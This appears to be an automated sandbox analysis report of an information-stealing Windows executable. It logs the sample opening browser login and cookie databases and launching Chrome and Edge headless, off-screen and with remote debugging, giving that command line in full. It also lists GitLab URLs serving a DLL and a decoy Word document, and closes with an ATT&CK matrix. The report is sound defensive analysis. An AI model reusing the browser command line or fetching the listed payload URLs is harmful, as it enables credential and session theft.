      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (28).png
      Source: C:\Users\user\Desktop\#U2800.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeMemory allocated: 23423550000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB84BE70 GetSystemInfo,0_2_00007FFDFB84BE70
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.manp7I3
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.manp7I3
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.man0`H3
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.man0`H3
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.man0`H3
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427BA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.manp7I3
      Source: #U2800.exe, 00000000.00000002.1976727792.00000234235F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\#U2800.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB879AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFDFB879AC0
      Source: C:\Users\user\Desktop\#U2800.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB879AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFDFB879AC0
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB86B728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFDFB86B728
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9940 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Source: Yara matchFile source: #U2800.exe, type: SAMPLE
      Source: C:\Users\user\Desktop\#U2800.exeCode function: 0_2_00007FFDFB86BFF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFDFB86BFF0

      Stealing of Sensitive Information

      barindex
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\Public\Documents\638724335987723943\FilesJump to behavior
      Source: C:\Users\user\Desktop\#U2800.exeDirectory queried: C:\Users\Public\Documents\638724335987723943\Files\DJump to behavior
      Source: Yara matchFile source: Process Memory Space: #U2800.exe PID: 6944, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: C:\Users\user\Desktop\#U2800.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9626 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      1
      OS Credential Dumping
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Query Registry
      Remote Desktop Protocol11
      Data from Local System
      1
      Remote Access Software
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager11
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      Process Discovery
      SSHKeylogging3
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials11
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      #U2800.exe3%ReversingLabs
      #U2800.exe1%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\e_sqlite3.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://schemas.microsoft.c0%Avira URL Cloudsafe
      http://schemas.m%0%Avira URL Cloudsafe
      http://schemas.openxmlfrg/markup-compatibility/20060%Avira URL Cloudsafe
      http://schemas.openxmlformats0%Avira URL Cloudsafe
      http://schemas.openxmlf0%Avira URL Cloudsafe
      http://schemas.openxmlformats.0%Avira URL Cloudsafe
      http://schemas.openxmlforma0%Avira URL Cloudsafe
      https://api.ipify.org00%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      google.com
      142.250.185.206
      truefalse
        high
        gitlab.com
        172.65.251.78
        truefalse
          high
          www.google.com
          142.250.185.228
          truefalse
            high
            api.ipify.org
            104.26.13.205
            truefalse
              high
              ip-api.com
              208.95.112.1
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                  high
                  https://www.google.com/false
                    high
                    https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falsefalse
                      high
                      https://api.ipify.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
